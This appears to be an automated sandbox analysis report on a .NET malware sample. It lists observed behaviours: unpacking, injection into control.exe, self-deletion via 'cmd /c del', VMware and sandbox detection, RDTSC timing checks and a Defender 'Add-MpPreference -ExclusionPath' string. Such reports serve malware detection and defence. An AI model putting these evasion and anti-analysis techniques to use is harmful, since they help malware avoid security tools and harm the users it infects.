            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: iAuPyHuUkk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: iAuPyHuUkk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe, 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp
            Source: Binary string: control.pdb source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdb source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe
            Source: Binary string: control.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: iAuPyHuUkk.exe, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.iAuPyHuUkk.exe.f00000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.iAuPyHuUkk.exe.f00000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.2.iAuPyHuUkk.exe.bc0000.1.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.0.iAuPyHuUkk.exe.bc0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_01A42018 push ebx; retf 0_2_01A4207A
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_064D1450 push es; ret 0_2_064D1460
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_064D14CD push es; iretd 0_2_064D14D4
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_064D3E6D push FFFFFF8Bh; iretd 0_2_064D3E6F
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_064D3E76 push es; ret 0_2_064D3E77
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_064D1CE0 push eax; retf 0_2_064D1CE1
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041B832 push eax; ret 3_2_0041B838
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041B83B push eax; ret 3_2_0041B8A2
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041B89C push eax; ret 3_2_0041B8A2
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041C2A5 push dword ptr [A265E993h]; ret 3_2_0041C6CF
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004154CF push es; iretd 3_2_004154D0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00413D9D push ecx; retf 3_2_00413D9E
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041B7E5 push eax; ret 3_2_0041B838
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BED0D1 push ecx; ret 13_2_04BED0E4
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CB89C push eax; ret 13_2_009CB8A2
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CB83B push eax; ret 13_2_009CB8A2
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CB832 push eax; ret 13_2_009CB838
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C54CF push es; iretd 13_2_009C54D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C3D9D push ecx; retf 13_2_009C3D9E
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CBDB1 push ecx; ret 13_2_009CBDB4
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CC6A5 push dword ptr [A265E993h]; ret 13_2_009CC6CF
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CB7E5 push eax; ret 13_2_009CB838
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CBF1E push 00000015h; iretd 13_2_009CBF20
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CBF2F push es; iretd 13_2_009CBF30
            Source: initial sampleStatic PE information: section name: .text entropy: 7.86255981519

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\control.exeProcess created: /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: C:\Windows\SysWOW64\control.exeProcess created: /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'Jump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.33e3150.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.34116cc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.370638895.00000000033C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: iAuPyHuUkk.exe PID: 476, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000009B8614 second address: 00000000009B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000009B89AE second address: 00000000009B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe TID: 580Thread sleep time: -32918s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe TID: 5528Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\control.exe TID: 7072Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004088E0 rdtsc 3_2_004088E0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread delayed: delay time: 32918Jump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000005.00000000.424615605.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000005.00000000.424529309.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000005.00000000.415338335.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000005.00000000.424529309.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000005.00000000.415338335.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.393239210.000000000095C000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
            Source: explorer.exe, 00000005.00000000.400888478.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
            Source: explorer.exe, 00000005.00000000.400888478.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: explorer.exe, 00000005.00000000.424615605.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000005.00000000.393239210.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004088E0 rdtsc 3_2_004088E0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCF0BF mov ecx, dword ptr fs:[00000030h]13_2_04BCF0BF
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCF0BF mov eax, dword ptr fs:[00000030h]13_2_04BCF0BF
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCF0BF mov eax, dword ptr fs:[00000030h]13_2_04BCF0BF
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68CD6 mov eax, dword ptr fs:[00000030h]13_2_04C68CD6
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD90AF mov eax, dword ptr fs:[00000030h]13_2_04BD90AF
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]13_2_04C2B8D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov ecx, dword ptr fs:[00000030h]13_2_04C2B8D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]13_2_04C2B8D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]13_2_04C2B8D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]13_2_04C2B8D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]13_2_04C2B8D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16CF0 mov eax, dword ptr fs:[00000030h]13_2_04C16CF0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16CF0 mov eax, dword ptr fs:[00000030h]13_2_04C16CF0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16CF0 mov eax, dword ptr fs:[00000030h]13_2_04C16CF0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99080 mov eax, dword ptr fs:[00000030h]13_2_04B99080
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C514FB mov eax, dword ptr fs:[00000030h]13_2_04C514FB
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C13884 mov eax, dword ptr fs:[00000030h]13_2_04C13884
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C13884 mov eax, dword ptr fs:[00000030h]13_2_04C13884
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAB02A mov eax, dword ptr fs:[00000030h]13_2_04BAB02A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAB02A mov eax, dword ptr fs:[00000030h]13_2_04BAB02A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAB02A mov eax, dword ptr fs:[00000030h]13_2_04BAB02A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAB02A mov eax, dword ptr fs:[00000030h]13_2_04BAB02A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCBC2C mov eax, dword ptr fs:[00000030h]13_2_04BCBC2C
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2C450 mov eax, dword ptr fs:[00000030h]13_2_04C2C450
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2C450 mov eax, dword ptr fs:[00000030h]13_2_04C2C450
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C61074 mov eax, dword ptr fs:[00000030h]13_2_04C61074
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C52073 mov eax, dword ptr fs:[00000030h]13_2_04C52073
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]13_2_04C51C06
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6740D mov eax, dword ptr fs:[00000030h]13_2_04C6740D
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6740D mov eax, dword ptr fs:[00000030h]13_2_04C6740D
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6740D mov eax, dword ptr fs:[00000030h]13_2_04C6740D
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16C0A mov eax, dword ptr fs:[00000030h]13_2_04C16C0A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16C0A mov eax, dword ptr fs:[00000030h]13_2_04C16C0A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16C0A mov eax, dword ptr fs:[00000030h]13_2_04C16C0A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16C0A mov eax, dword ptr fs:[00000030h]13_2_04C16C0A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C64015 mov eax, dword ptr fs:[00000030h]13_2_04C64015
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C64015 mov eax, dword ptr fs:[00000030h]13_2_04C64015
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB746D mov eax, dword ptr fs:[00000030h]13_2_04BB746D
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17016 mov eax, dword ptr fs:[00000030h]13_2_04C17016
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17016 mov eax, dword ptr fs:[00000030h]13_2_04C17016
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17016 mov eax, dword ptr fs:[00000030h]13_2_04C17016
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB0050 mov eax, dword ptr fs:[00000030h]13_2_04BB0050
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB0050 mov eax, dword ptr fs:[00000030h]13_2_04BB0050
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC35A1 mov eax, dword ptr fs:[00000030h]13_2_04BC35A1
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCFD9B mov eax, dword ptr fs:[00000030h]13_2_04BCFD9B
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCFD9B mov eax, dword ptr fs:[00000030h]13_2_04BCFD9B
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B92D8A mov eax, dword ptr fs:[00000030h]13_2_04B92D8A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B92D8A mov eax, dword ptr fs:[00000030h]13_2_04B92D8A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B92D8A mov eax, dword ptr fs:[00000030h]13_2_04B92D8A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B92D8A mov eax, dword ptr fs:[00000030h]13_2_04B92D8A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B92D8A mov eax, dword ptr fs:[00000030h]13_2_04B92D8A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C48DF1 mov eax, dword ptr fs:[00000030h]13_2_04C48DF1
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCA185 mov eax, dword ptr fs:[00000030h]13_2_04BCA185
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBC182 mov eax, dword ptr fs:[00000030h]13_2_04BBC182
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9B1E1 mov eax, dword ptr fs:[00000030h]13_2_04B9B1E1
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9B1E1 mov eax, dword ptr fs:[00000030h]13_2_04B9B1E1
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9B1E1 mov eax, dword ptr fs:[00000030h]13_2_04B9B1E1
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C13540 mov eax, dword ptr fs:[00000030h]13_2_04C13540
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC513A mov eax, dword ptr fs:[00000030h]13_2_04BC513A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC513A mov eax, dword ptr fs:[00000030h]13_2_04BC513A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC4D3B mov eax, dword ptr fs:[00000030h]13_2_04BC4D3B
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC4D3B mov eax, dword ptr fs:[00000030h]13_2_04BC4D3B
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC4D3B mov eax, dword ptr fs:[00000030h]13_2_04BC4D3B
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9AD30 mov eax, dword ptr fs:[00000030h]13_2_04B9AD30
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]13_2_04BA3D34
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB4120 mov eax, dword ptr fs:[00000030h]13_2_04BB4120
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB4120 mov eax, dword ptr fs:[00000030h]13_2_04BB4120
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB4120 mov eax, dword ptr fs:[00000030h]13_2_04BB4120
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB4120 mov eax, dword ptr fs:[00000030h]13_2_04BB4120
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB4120 mov ecx, dword ptr fs:[00000030h]13_2_04BB4120
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99100 mov eax, dword ptr fs:[00000030h]13_2_04B99100
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99100 mov eax, dword ptr fs:[00000030h]13_2_04B99100
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99100 mov eax, dword ptr fs:[00000030h]13_2_04B99100
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9B171 mov eax, dword ptr fs:[00000030h]13_2_04B9B171
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9B171 mov eax, dword ptr fs:[00000030h]13_2_04B9B171
